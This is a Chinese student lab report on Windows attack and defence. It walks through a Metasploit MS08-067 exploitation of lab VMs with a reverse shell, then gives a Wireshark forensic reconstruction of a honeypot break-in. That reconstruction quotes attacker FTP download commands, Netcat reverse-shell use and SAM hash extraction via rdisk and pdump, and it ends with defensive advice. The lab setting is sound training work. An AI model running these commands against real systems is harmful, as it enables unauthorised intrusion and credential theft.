实践六 Windows系统攻防

一、实验内容

1.主要任务

本实验围绕 Windows 系统攻防,设置了三项逐层深入的实践任务:

  1. Metasploit 远程渗透攻击
    使用 Kali Linux 作为攻击机,利用 Metasploit 框架中的 MS08-067 漏洞模块,对 Windows 靶机发起远程渗透攻击,获取目标主机的系统级控制权,并验证攻击效果。
  2. 取证分析:解码 NT 系统破解攻击
    给定一份来自蜜罐主机的网络流量数据,通过 Wireshark 等工具分析攻击全过程。要求还原攻击者使用的工具链、进入系统的方式、获得控制权后的操作,并判断攻击者是否察觉目标是蜜罐,最后提出防御方案。
  3. 团队对抗实践:Windows 远程渗透与流量分析
    两人一组,攻方使用 Metasploit 对 Win2kServer 靶机进行渗透攻击,并在目标系统中留下攻击痕迹;守方通过 Wireshark 捕获网络流量,分析攻击过程,提取攻击方信息、利用的漏洞及攻击 IP 等关键证据。

2.实验环境

  • 主机系统:Windows 11
  • 虚拟化平台:VMware Workstation 17 Pro
  • 虚拟机
主机 IP地址 Mac地址
Win2kServer_SP0 192.168.188.8
Kali Linux 2025.4 192.168.188.7 00:0c:29:d2:d4:c0
VMNet8网卡 192.168.188.1 00:50:56:fa:aa:1e
  • 网络模式:NAT模式(VMnet8,子网 192.168.188.0/24)确保虚拟机间及与宿主机互通。

3.知识点梳理

3.1 漏洞原理与利用

(1)MS08-067(SMB 远程代码执行漏洞)

  • 存在于 Windows 2000/XP/Server 2003 的 netapi32.dll 中,攻击者通过 TCP 445 端口发送特制 RPC 请求触发栈溢出,以 SYSTEM 权限远程执行代码。
  • 漏洞无需认证即可利用,危害极大,是 Metasploit 中最经典的漏洞模块之一。

(2)MS00-006(mdac.dll IIS 远程命令执行漏洞)

  • 存在于 MDAC 的 RDS 组件中,攻击者通过构造特定 HTTP 请求,在 IIS 服务器上以 Web 服务账户权限执行任意系统命令。
  • 在 Wireshark 中表现为大量对 /msadc/msadc.dll 的 GET 请求,URI 中常包含 cmd.exe 等命令执行标记。

3.2 Metasploit 渗透测试框架

  • msfconsole 基本操作流程search(搜索漏洞)→ use(加载模块)→ show payloads(查看载荷)→ set PAYLOAD(选择载荷)→ set RHOST/LHOST(配置目标与本地 IP)→ show options(确认参数)→ exploit(执行攻击)。
  • 正向 Shell 与反向 Shell 的区别:反向 Shell(reverse_tcp)由目标主机主动连接攻击者,可绕过防火墙限制,是渗透测试中的常用选择。

3.3 恶意工具链与后门部署

  • FTP 命令行工具:攻击者使用 ftp.exe 从远程服务器下载黑客工具,Wireshark 中可通过 USERPASSRETR 命令序列提取登录凭证。
  • Netcat(nc.exe):建立反向 Shell,提供稳定的命令控制通道。
  • pdump.exe / samdump.dll:导出 Windows 密码哈希值,用于离线破解获取管理员凭证。
  • 分析技巧:使用 ip.addr == <目标IP> && ftp 过滤 FTP 流量,通过“追踪 TCP 流”还原完整命令对话。

3.4 Windows 系统取证与攻击链还原

通过 Wireshark 对蜜罐捕获数据的逐层分析,重构攻击的完整生命周期:

  1. HTTP 流量过滤:定位漏洞探测与利用报文
  2. FTP 流量分析:提取工具传输过程及攻击者服务器信息
  3. TCP 流追踪:逐条还原 dirnet userrdiskdel 等命令,理解攻击者意图
  4. 攻击行为研判:系统探索 → 痕迹清除 → 提权尝试 → 凭证窃取 → 察觉蜜罐并挑衅
  5. 防护建议归纳:基于攻击路径提出针对性防御措施

3.5 系统提权与凭证窃取

  • rdisk 命令:强制更新 Windows 紧急修复磁盘,将 SAM 数据库导出至 C:\WINNT\repair\ 目录,攻击者可从中提取密码哈希进行离线破解。
  • net 系列命令:用于系统探测(net usersnet name)和提权尝试(net user <用户名> /ADD)。
  • 权限限制分析:Web 服务账户权限较低,无法直接访问 SAM 文件或添加用户,需要配合其他提权手段。

二、实验过程

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

首先确保靶机Win2kServer_SP0在VMnet8下

image-20260422155233823

如果查看ip发现地址不在VMnet8网段,可以这样修改

image-20260422155206992

在kali攻击机上输入指令打开metasploit软件

sudo su
msfconsole

image-20260422160120010

查看漏洞ms08_067详细信息

search ms08_067

image-20260422160219443

输入以下指令进入漏洞所在文件,并显示此漏洞的载荷

use exploit/windows/smb/ms08_067_netapi 
show payloads

image-20260422160533549

设置攻击的载荷为tcp的反向连接

set PAYLOAD generic/shell_reverse_tcp

配置两个IP,分别是LHOST(本地ip地址:kali攻击机)和RHOSTS(目标ip地址:靶机Win2kServer_SP0)

set LHOST 192.168.188.7
set RHOST 192.168.188.8

image-20260422160826532

查看其参数以及此漏洞需要的设置

show options

image-20260422160853361

开始渗透攻击

exploit

验证攻击成果

ipconfig # 查看靶机ip地址成功
ping 192.168.188.7 # ping kali 成功

image-20260422161205487

(2)取证分析实践:解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

攻击分析

首先过滤出http流量

ip.addr == 172.16.1.106 && http

image-20260427091442023

随后发现大量对msadc.dll的GET请求

image-20260427091607064

跟踪149号包发现

image-20260427091744029

取消追踪,继续往下翻(991~1233),发现

image-20260427092403170

攻击者使用open 213.116.251.162 >ftpcom等命令攻击靶机,尝试打开ftp服务,并下载nc.exe、pdump.exe等

于是开始过滤ftp包

image-20260427093243981

可以看到并没有一次成功,攻击者发送了Goodbye(528)

随后攻击者连接到了另一台FTP服务器,这次成功了。

image-20260427094349861

用户名和密码分别是johna2k和haxedj00

追踪发现已经把nc.exe和pdump.exe成功导入到靶机

image-20260427094448060

这时候我随便在后面的tcp包中选取一个进行追踪,发现攻击者进行了大量的查看目录命令

image-20260427094825702

此处应该是删除入侵信息

image-20260427095154274

这里应该是发现蜜罐(可能是因为查看目录结构时发现和蜜罐很相似),还留下了入侵信息:“我知道这是实验室服务器,但请打好补丁”

image-20260427095033784

查看用户组

image-20260427095400564

尝试添加用户但是失败了

image-20260427095456048

删除使用的入侵工具

image-20260427095540752

攻击者多次执行 rdiskrdisk -s 命令,触发系统紧急修复磁盘的更新。同时他反复使用 dir 监控 C:\WINNT\repair\ 目录,观察到 $$hive$$.tmpsam._security._software._ 等文件大小和更新时间发生变化。这表明 rdisk 正在后台将当前注册表 hive 的副本写入 repair 目录,攻击者企图从中提取 SAM 密码哈希。

image-20260427102128581

攻击者最终在根目录下生成了一个名为 har.txt的文件,他可能通过某种方式将密码哈希成功保存下来,准备离线破解。

image-20260427102106639

后面追踪其他tcp流(tcp.stream eq 178),发现攻击者明确了靶机是个蜜罐

image-20260427102203559

QA(这部分是AI对上述分析流程的整理)

1.攻击者使用了什么破解工具进行攻击

  • 漏洞利用工具:针对 msadc.dll 的 IIS 远程代码执行漏洞(MS00-006)的专用利用脚本或扫描器,用于获取初始命令执行权。
  • 命令行 FTP 客户端:Windows 自带的 ftp.exe,用于连接攻击者服务器下载后续工具。
  • 后门工具:Netcat (nc.exe),用于建立稳定的反向 shell。
  • 密码窃取工具pdump.exesamdump.dll,用于导出系统密码哈希。
  • 系统自带命令rdisk,用于强制更新紧急修复盘,提取 SAM 文件;以及 net 系列命令,用于系统探测和提权尝试。

2.攻击者如何使用这个破解工具进入并控制了系统

  1. 初始突破:攻击者(212.116.251.162)扫描目标蜜罐(172.16.1.106)的 Web 服务,发现存在 msadc.dll 漏洞。通过构造恶意 HTTP GET 请求,成功触发了远程命令执行,获得了一个运行在 IIS 进程权限下的初始 shell。
  2. 工具下发:在初始 shell 中执行 FTP 命令,使用 johna2k / haxedj00 凭据登录,下载了 nc.exe、pdump.exe和 samdump.dll。
  3. 建立后门:攻击者在目标机器上运行 nc.exe,主动反向连接攻击者电脑,建立了一个稳定、可交互的远程命令行控制通道,彻底控制了系统。

3.攻击者获得系统访问权限后做了什么

  • 清理现场:删除了 FTP 命令脚本 以及部分下载的工具。
  • 系统探索:浏览了相当多目录,并使用 net usersnet name 查看用户列表及主机名。
  • 察觉蜜罐并挑衅 😃 <-经典表情:意识到这是一台蜜罐,在根目录创建 README.NOW.Hax0r 文件,留下留言:“echo Hi, i know that this a ..is a lab server, but patch the holes! 😃”。
  • 尝试权限提升与凭证窃取
    • 运行 pdump 失败(权限不足)。
    • 尝试添加用户 himan 失败。
    • 执行 rdisk -s,强制创建紧急修复盘,从 C:\WINNT\repair\ 目录中提取 SAM 备份文件,最终将密码哈希导出为二进制文件 har.txt,试图离线破解。

4.我们如何防止这样的攻击

  • 及时修补漏洞:安装操作系统及应用软件的安全更新,修复如 MS00-006 等已知漏洞。
  • 最小化攻击面:卸载或禁用服务器上不必要的 IIS 扩展与组件(如 RDS/MDAC),删除无用的脚本映射。
  • 强化出站访问控制:在防火墙策略中严格限制服务器主动向互联网发起的连接,阻止 FTP 下载、反向 Shell 等行为。
  • 最小权限原则:将 Web 服务运行在低权限账户下,杜绝其对系统 SAM 文件、注册表等敏感资源的访问权限。
  • 部署入侵检测/防御系统:配置 IDS/IPS 规则,检测针对 msadc.dll 的恶意 HTTP 请求、异常 FTP 流量及 Netcat 等黑客工具传输。
  • 加强密码与审计:设置复杂密码策略,定期审计系统日志和账户变更,及时发现异常行为。

5.你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

发现了,直接留言:“echo Hi, i know that this a ..is a lab server, but patch the holes! 😃”。

(3)团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

环境配置

(1)网络环境

两台物理机连接上手机开启热点

虚拟机均调整到桥接模式,不复制物理机网络连接状态

(2)靶机

20251908

物理机IP地址:10.166.207.154

image-20260422161725599

验证可以ping通攻击机(物理机)

image-20260422161751328

(3)攻击机

20251918

物理机IP地址:10.166.207.5

(4)靶机网络配置

image-20260422162207208

image-20260422163339980

可以ping 通攻击机(物理机)

image-20260422162351721

可以ping通攻击机(虚拟机)

image-20260422163412351

开始实验

攻击机使用metasploit软件进行攻击

image-20260427103413137

输入指令use exploit/windows/smb/ms08_067_netapi加载MS08-067漏洞的核心利用模块。

image-20260427103426421

输入指令show payloads列出该漏洞可兼容的攻击载荷

image-20260427103442361

输入指令set payload generic/shell_reverse_tcp 设置反向TCP Shell载荷,输入指令set LHOST 10.166.207.127设置Kali攻击机的IPset RHOST 10.166.207.1设置Win2kServer被攻击机的IP。

image-20260427103455654

输入指令show options查看设置的信息

image-20260427103510537

输入指令exploit进行攻击

image-20260427103539549

输入指令mkdir junhua666在对方主机中创建文件夹

输入指令cd junhua666进入该文件夹

输入指令echo I love caixukun 20251918 junhua666>>Gift.txt在对方主机中创建一个Gift.txt文件并留言如上

image-20260427103601695

验证攻击结果

image-20260422165607346

分析pcap文件,看到了攻击后的流程

image-20260422165922914

三、学习中遇到的问题及解决

1.输入指令exploit进行攻击时失败

在团队对抗实践中,输入指令exploit进行攻击时反复尝试几次失败,等一会就好了

AI的解释是:MS08-067漏洞利用对目标SMB服务的状态有一定依赖。前几次攻击可能已在目标系统触发服务异常,导致目标SMB服务短暂进入不稳定状态;等待片刻后服务自动恢复,再发起攻击即可成功。此外,Metasploit的某些载荷在短时间内频繁连接也可能触发目标系统的自我保护机制。

四、学习感悟、思考等

4.学习感悟与思考

本次实验从攻击和防御两个视角,完整呈现了一次 Windows 远程渗透的全过程。攻击实践让我深刻认识到,老旧系统在 Metasploit 面前不堪一击,打好补丁是安全防护的底线。取证分析则锻炼了我从网络流量中还原攻击链的能力,通过层层过滤和追踪,像拼图一样重构出攻击者从漏洞利用到留下挑衅留言的完整过程,使我真切体会到“攻击链”每个环节的防护都至关重要。

参考资料:

posted @ 2026-04-27 10:50  _Biyan  阅读(4)  评论(0)    收藏  举报